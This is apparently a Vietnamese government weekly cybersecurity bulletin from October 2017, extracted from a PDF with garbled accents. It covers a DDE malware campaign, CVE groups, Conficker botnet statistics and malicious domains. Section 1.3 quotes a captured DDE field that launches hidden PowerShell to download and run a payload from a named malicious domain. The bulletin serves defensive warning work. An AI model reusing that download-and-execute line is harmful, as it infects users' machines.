BỘ THƠNG TIN VÀ TRUYỀN THƠNG CỤC AN TỒN THƠNG TIN CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM Số: 47/BC-CATTT Hà Nội, ngày 31 tháng 10 năm 2017 Độc lập - Tự - Hạnh phúc TĨM TẮT Tình hình an tồn thơng tin đáng ý tuần 43/2017 (từ ngày 23/10/2017 đến ngày 29/10/2017) Cục An toàn thơng tin quan có chức tham mưu, giúp Bộ trưởng Bộ Thông tin Truyền thông quản lý nhà nước tổ chức thực thi pháp luật an tồn thơng tin Qua cơng tác thu thập, theo dõi, trích xuất, phân tích thơng tin tuần 43/2017 (từ ngày 23/10/2017 đến ngày 29/10/2017), Cục An toàn thơng tin thực tổng hợp tóm tắt an tồn thơng tin diễn tuần Cục An tồn thơng tin gửi tóm tắt tình hình để quan, tổ chức, cá nhân tham khảo có biện pháp phòng ngừa hợp lý BẢNG TỔNG HỢP Bộ Thơng tin Truyền thơng có văn số 3858/BTTTT-KHTC ngày 23/10/2017 gửi Bộ Tài đề xuất ban hành Thơng tư Bộ Tài hướng dẫn sử dụng kinh phí nghiệp chi cho cơng tác bảo đảm ATTT Trong tuần ghi nhận 05 nhóm lỗ hổng, điểm yếu cho gây ảnh hướng lớn đến người dùng Việt Nam Điểm tin đáng ý 1.1 Nhằm tháo gỡ khó khăn, vướng mắc, tạo sở pháp lý cho việc xây dựng, đăng ký bảo vệ dự toán chi cho hoạt động bảo đảm an tồn thơng tin, ngày 23/10/2017, Bộ Thơng tin Truyền thơng có văn số 3858/BTTTT-KHTC gửi Bộ Tài đề xuất ban hành Thơng tư Bộ Tài quy định, hướng dẫn mục chi, quản lý sử dụng kinh phí nghiệp chi cho cơng tác bảo đảm an tồn thông tin hoạt động quan, tổ chức nhà nước Trong đó, Bộ Thơng tin Truyền thông đề xuất 19 mục chi cho hoạt động bảo đảm an tồn thơng tin theo quy định Luật an tồn thơng tin mạng 1.2 Chính phủ Đức tuyên bố trọng đến vấn đề an tồn thơng tin mạng mạng, đảm bảo cho mạng lưới thiết bị kết nối Internet (Internet of © Phiên phát hành rộng rãi Things - IoT) an toàn trước nguy bị công, đặc biệt “mạnh tay” xử lý mạng máy tính ma Theo đó, quan quản lý mạng Liên bang Đức cảnh báo nhà điều hành mạng phát thiết bị kết nối nằm mạng máy tính ma Trong trường hợp cần thiết, quan phép tắt thiết bị nhằm hạn chế tác hại vụ công Đối với Việt Nam, Bộ Thơng tin Truyền thơng hồn thành dự thảo Đề án Nâng cao lực phòng, chống phần mềm độc hại để trình Thủ tướng Chính phủ, đặt trọng tâm vào việc hình thành chế phối hợp quan chức nhà mạng việc đối phó với mạng máy tính ma 1.3 Trong tuần vừa qua số hộp thư điện tử công vụ xuất hình thức/kỹ thuật cơng cho phép cài cắm mã độc vào máy tính người dùng thơng qua ứng dụng, tài liệu Microsoft Office dựa giao thức DDE (Dynamic Data Exchange) DDE giao thức cho phép chuyển liệu ứng dụng Windows mà người dùng khơng cần tương tác Tính không yêu cầu macro không xuất cảnh báo bảo mật, xuất hộp thoại thông báo cập nhật liệu từ nguồn khác Do đối tượng lợi dụng tính để thực thi mã lệnh nhúng đường dẫn độc hại, cài cắm mã độc vào máy tính người dùng Một đoạn mã Đoạn mã độc hại khai thác sử dụng DDE để tải mã độc nhúng vào tập tin docx độc hại Cục ATTT thu thập sau: DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://pragmaticinquiry.org/hjergf76');power shell -e $e " Ошибка! Разде Khi người dùng mở tập tin ứng dụng có chức DDE chấp nhận thông báo “This document contains links that may refer to other files Do you want to update this document with the data from the linked files?” hộp thoại (thông báo việc cập nhật liệu từ nguồn khác) (tham khảo hình dưới) máy tính tự động tải mã độc từ liên kết hxxp://pragmaticinquiry.org/hjergf76 sau tiếp tục cập nhật mẫu mã độc khác Các ứng dụng sử dụng giao thức DDE bị lợi dụng để lây nhiễm mã độc vào máy tính người dùng bao gồm ứng dụng thuộc Microsoft Office có Microsoft Outlook - ứng dụng Mailclient hay người dùng sử dụng để gửi, nhận thư điện tử Windows © Phiên phát hành rộng rãi Hộp thoại thông báo chức DDE (Nếu chọn “yes” mã độc cài cắm vào máy tính) Qua thơng tin Microsoft xác nhận với nhóm chuyên gia bảo mật từ Sensepost (Etienne Stalmans Saif El-Sherei – nhóm chun gia tìm lỗ hổng) khơng phải lỗ hổng ứng dụng nên chưa có vá ngay, Microsoft khắc phục phiên phần mềm Nhiều hãng bảo mật cảnh báo chiến dịch cơng lợi dụng tính Do người dùng cần phải cảnh giác mở tập tin word, excel mở email ứng dụng Outlook Ngồi người dùng chủ động tắt tính ứng dụng phổ biến nằm Microsoft Office Outlook, Word, Excel… Lỗ hổng/điểm yếu an tồn thơng tin tuần 2.1 Trong tuần 43/2017, tổ chức quốc tế phát cơng bố 394 lỗ hổng có: có 22 lỗ hổng mức cao, 136 lỗ hổng mức trung bình, 09 lỗ hổng mức thấp, 227 lỗ hổng chưa đánh giá Số lượng lỗ hổng công bố Tuần 43 300 250 227 200 136 150 100 50 22 Mức cao Mức trung bình Mức thấp Chưa đánh giá Mức cao Mức trung bình Mức thấp Chưa đánh giá Hình 1: Thống kê số lượng lỗ hổng cơng bố Tuần 43 © Phiên phát hành rộng rãi 2.2 Trong đó, hệ thống kỹ thuật Cục An tồn thơng tin chủ động rà quét không gian mạng Việt Nam, đánh giá, thống kê cho thấy có 05 nhóm lỗ hổng sản phẩm, dịch vụ CNTT phổ biến, gây ảnh hưởng lớn đến người dùng Việt Nam, nhóm lỗ hổng sản phẩm Apple, nhóm lỗ hổng trình duyệt Chrome v.v… Thời điểm lỗ hổng, điểm yếu công bố theo mốc thời gian (timeline) sau: Hình 2: Các lỗ hổng có khả ảnh hưởng tới nhiều người dùng Việt Nam 2.3 Chi tiết thông tin số lỗ hổng sản phẩm/dịch vụ phổ biến Việt Nam cụ thể sau: STT Sản phẩm/ dịch vụ Mã lỗi quốc tế Mô tả ngắn Ghi Chú Nhóm lỗ hổng sản phẩm Apple cho phép thực thi mã lệnh, vượt qua chế bảo mật thực hành động trái phép Trong đó: 35 lỗ hổng tvOS WatchOS, 17 lỗ Đã có hổng ảnh hưởng tới vá MacOS, 12 lỗ hổng iOS, 03 lỗ hổng trình duyệt Safari, lỗ hổng Xcode (04), itunes (01), icloud (01) ứng dụng Apple Support iOS (01) Apple CVE-2017-7086 CVE-2017-7103 CVE-2017-7105 CVE-2017-7108 CVE-2017-7110 CVE-2017-7112 CVE-2017-7114 CVE-2017-7116 CVE-2017-7127 … gnu-glibc Nhóm lỗ hổng thư CVE-2017-15670 viện glibc sử dụng hầu Đã có CVE-2017-15804 vá hết hệ điều hành linux © Phiên phát hành rộng rãi cho phép thực thi mã lệnh, từ thực nhiều hành động độc hại khác Google Chrome F5 CVE-2017-5057 CVE-2017-5111 Nhóm lỗ hổng trình duyệt Chrome cho phép thực thi mã lệnh, vượt qua chế bảo mật thực Đã có hành động trái phép, vá đồng thời ăn trộm thông tin nhạy cảm máy tính người dùng CVE-2017-6157 CVE-2017-6162 CVE-2017-6160 Nhóm 08 lỗ hổng sản phẩm hãng F5 Network gồm:F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Đã có Link Controller, PEM, vá Websafe cho phép thực nhiều hình thức cơng khác có đối tượng cơng có thể: thay đổi cấu hình hệ thống, thực thi mã lệnh Lỗ hổng CVE-2017-15291 nằm sản phẩm TLMR3220 TP-Link có Tp-link phép chèn thực Đã có mã khai thác CVE-2017-15291 cơng XSS từ kiểm Chưa có CVE-2017-13772 sốt thiết bị; thơng tin Lỗ hổng CVE-2017-13772 vá nằm sản phẩm WR940N WiFi cho phép thực thi mã lệnh © Phiên phát hành rộng rãi Hoạt động số mạng botnet, APT, mã độc Việt Nam 3.1 Mạng botnet Conficker Mạng botnet Conficker phát từ tháng 10/2008 Mã độc thiết kế nhằm vào hệ điều hành Microsoft Windows Khi mã độc lây nhiễm vào máy tính, máy tính tham gia vào mạng botnet bị điều khiển để gửi thư rác (spam) công hệ thống khác Những máy tính bị lây nhiễm khơng truy cập website liên quan đến phần mềm diệt virus hay dịch vụ cập nhật hệ Windows (Windows Update) Thống kê số lượng IP nằm mạng botnet Conficker theo ISP 20000 17599 15000 10000 5000 154 379 2137 5456 7517 SPT CMC SCTV SPT FPT CMC SCTV Số lượng IP Viettel FPT VNPT Viettel VNPT Mặc dù mạng botnet Conficker xuất từ năm 2008, lợi dụng lỗ hổng cũ (MS 08-067), có vá bảo mật, nhiên Việt Nam, số lượng máy tính nằm mạng botnet Conficker nhiều tuần 43 mà Cục An tồn thơng tin theo dõi 3.2 Danh sách 10 IP Public có nhiều truy vấn đến IP/tên miền độc hại TT Danh sách IP ISP Số lượng truy vấn 203.128.246.88 Hanoi Telecom 168 203.128.246.92 Hanoi Telecom 168 210.245.80.75 FPT 168 210.86.230.202 Netnam 168 © Phiên phát hành rộng rãi 27.72.98.98 Viettel 168 27.74.254.67 Viettel 168 42.112.40.166 FPT 168 42.112.40.167 FPT 168 124.158.1.7 CMC 205 10 203.190.163.125 Viettel 563 3.3 Danh sách IP/tên miền độc hại có nhiều kết nối từ Việt Nam Tên miền TT n.hmiblgoja.ru theloopofgisterezisg.com nspjzpovqez.com mgmwmwkqmcqg.com www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com axtes.com pragmaticinquiry.org deltasec.net gdiscoun.org Ghi Mẫu mã độc khai thác tính DDE đề cập tới phần Báo cáo Khuyến nghị quan, đơn vị Theo thống kê số lượng máy tính Việt Nam nằm mạng botnet quốc tế không nhỏ Nhằm bảo đảm an tồn thơng tin hệ thống mạng quan đơn vị, Cục An tồn thơng tin khuyến nghị: - Theo dõi cập nhật vá cho lỗ hổng, đặc biệt lỗ hổng nêu © Phiên phát hành rộng rãi - Chủ động kiểm tra, rà sốt, bóc gỡ mã độc khỏi hệ thống mạng Cục An toàn sẵn sàng phối hợp với quan tổ chức tiến hành kiểm tra bóc gỡ mã độc botnet hệ thống quan đơn vị Để xác minh máy tính bị nhiễm mã độc botnet, Quý đơn vị liên hệ với Cục An tồn thơng tin theo thông tin bên để phối hợp thực - Kiểm tra xử lý thiết bị tồn hệ thống mạng có dấu hiệu kết nối đến tên miền độc hại Cục An toàn thông tin chia sẻ, đặc biệt tên miền nêu báo cáo Thông tin liên hệ Cục An tồn thơng tin, tầng 8, số 115 Trần Duy Hưng, quận Cầu Giấy, TP Hà Nội; số điện thoại: 024.3943.6684; thư điện tử ais@mic.gov.vn Trân trọng./ Nơi nhận: - Bộ trưởng Thứ trưởng (để b/c); - Thư ký Lãnh đạo Bộ; - Đơn vị chuyên trách CNTT bộ, ngành; - Sở TT&TT tỉnh, thành phố trực thuộc TW; - Vụ Khoa giáo - Văn xã, Văn phòng Chính phủ; - Trung tâm CNTT, Văn phòng Trung ương Đảng; - Trung tâm CNTT, Văn phòng Quốc Hội; - Trung tâm CNTT, Văn phòng Chủ tịch nước; - Các Tập đoàn kinh tế; Tổng cơng ty nhà nước; Tổ chức tài Ngân hàng; - Cơ quan, đơn vị thuộc Bộ; - Lãnh đạo Cục; - Lưu: VT, TĐQLGS © Phiên phát hành rộng rãi KT CỤC TRƯỞNG PHÓ CỤC TRƯỞNG (email) Nguyễn Huy Dũng PHỤ LỤC I Báo cáo xây dựng dựa nguồn thông tin: - Hệ thống xử lý công mạng Internet Việt Nam, hệ thống trang thiết bị kỹ thuật phục vụ cho công tác quản lý nhà nước an tồn thơng tin Cục An tồn thơng tin quản lý vận hành; - Kênh liên lạc quốc tế an tồn thơng tin; hoạt động hợp tác Cục An tồn thơng tin tổ chức, hãng bảo mật giới - Hoạt động theo dõi, phân tích, tổng hợp tình hình an tồn thơng tin mạng trang mạng uy tín II Giới thiệu Hệ thống theo dõi, xử lý công mạng Internet Việt Nam trực thuộc Cục An tồn thơng tin: Trung tâm Tư vấn Hỗ trợ nghiệp vụ ATTT trực thuộc Cục An tồn thơng triển khai vận hành hệ thống kỹ thuật phục vụ công tác bảo đảm ATTT mạng quốc gia sau: Hệ thống phân tích, phát công mạng từ xa đa tảng Hệ thống xây dựng dựa công nghệ AI, thường xuyên dò quét, kiểm tra mục tiêu dựa hệ thống sensor sẵn có Cục An tồn thơng tin sensor khác tồn giới, từ đó, tự động phát hiện, cảnh báo sớm công mạng nhắm vào mục tiêu cấu hình sẵn, nhanh chóng thơng báo cho quản trị viên biết tình trạng cơng mạng © Phiên phát hành rộng rãi Hệ thống phân tích, dò qt, tự động phát công từ xa website, cổng thông tin điện tử Trước tình hình hệ thống website, trang/cổng thông tin điện tử quan, tổ chức sử dụng để cung cấp thông tin đến người dân, doanh nghiệp, bạn bè quốc tế sử dụng để cung cấp dịch vụ công trực tuyến phải đối mặt với nguy công, thay đổi giao diện, cài mã độc website… Cục An tồn thơng tin xây dựng, phát triển triển khai Hệ thống phân tích, dò qt, tự động phát công từ xa website, cổng thông tin điện tử Hệ thống thiết kế để hỗ trợ việc theo dõi, giám sát cảnh báo sớm mức độ ATTT website Hệ thống thực giám sát từ xa không can thiệp, không cài đặt phần mềm hay thiết bị vào hạ tầng quan chủ quản website Hệ thống theo dõi, phát mã độc, mạng botnet từ xa Hệ thống theo dõi cập nhật tình hình mã độc hại xây dựng triển khai để hỗ trợ đắc lực việc nắm bắt cụ thể đầy đủ tình hình lây nhiễm mã độc Việt Nam Từ có thơng tin để xây dựng kế hoạch phương án xử lý bóc gỡ mã độc diện rộng Với hệ thống cho phép cán quản lý, phân tích nắm bắt chi tiết dòng mã độc, mạng botnet hoạt động không gian mạng Việt Nam © Phiên phát hành rộng rãi 10 Bên cạnh hệ thống giúp cán phân tích nhanh chóng nắm bắt xu lây lan, phát triển họ mã độc, từ đề phương án ứng phó kịp thời cho thời điểm Hệ thống giám sát phòng, chống cơng mạng Hệ thống giám sát phòng, chống công mạng Cục ATTT xây dựng sở kết hợp giải pháp thương mại giải pháp nguồn mở, bảo đảm không phụ thuộc vào hãng hay công nghệ cụ thể việc hỗ trợ bảo vệ hệ thống thơng tin Cơ quan, tổ chức liên hệ để tư vấn, hỗ trợ công tác bảo đảm ATTT, cụ thể sau: - Đăng ký nhận thông tin cảnh báo chung ATTT, liên hệ: Ông Hà Văn Hiệp, số điện thoại: 0968689111, thư điện tử: hvhiep@mic.gov.vn; - Đăng ký theo dõi, giám sát trang/cổng thơng tin điện tử, liên hệ: Ơng Nguyễn Sơn Tùng, số điện thoại: 0977325416, thư điện tử: nstung@mic.gov.vn; - Đăng ký theo dõi, giám sát, xử lý mã độc, lừa đảo qua mạng, liên hệ: Bà Bùi Thị Huyền, số điện thoại:0932481987; thư điện tử: bt_huyen@mic.gov.vn; - Đăng ký hỗ trợ cài đặt cảm biến (sensor) để giám sát, phòng, chống cơng mạng, liên hệ: Ơng Nguyễn Phú Dũng, số điện thoại: 01676611700, thư điện tử: npdung@mic.gov.vn © Phiên phát hành rộng rãi 11 ... Apple CVE -2017- 7086 CVE -2017- 7103 CVE -2017- 7105 CVE -2017- 7108 CVE -2017- 7110 CVE -2017- 7112 CVE -2017- 7114 CVE -2017- 7116 CVE -2017- 7127 … gnu-glibc Nhóm lỗ hổng thư CVE -2017- 15670 viện glibc sử dụng... hổng CVE -2017- 15291 nằm sản phẩm TLMR3220 TP-Link có Tp-link phép chèn thực Đã có mã khai thác CVE -2017- 15291 cơng XSS từ kiểm Chưa có CVE -2017- 13772 sốt thiết bị; thông tin Lỗ hổng CVE -2017- 13772... hành động trái phép, vá đồng thời ăn trộm thơng tin nhạy cảm máy tính người dùng CVE -2017- 6157 CVE -2017- 6162 CVE -2017- 6160 Nhóm 08 lỗ hổng sản phẩm hãng F5 Network gồm:F5 BIG-IP LTM, AAM, AFM, Analytics,